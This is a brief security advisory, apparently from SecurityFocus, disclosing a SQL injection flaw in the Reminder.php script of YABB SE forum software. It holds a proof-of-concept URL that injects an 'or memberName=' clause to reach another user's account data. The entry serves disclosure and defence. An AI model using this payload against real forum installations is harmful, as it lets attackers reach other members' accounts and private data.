YABB SE Reminder.PHP SQL Injection Vulnerability

The following proof of concept has been made available by "VOID.AT Security" <crew@void.at>:

http://www.example.com/yabbse/Reminder.php?searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername]


 

Privacy Statement
Copyright 2010, SecurityFocus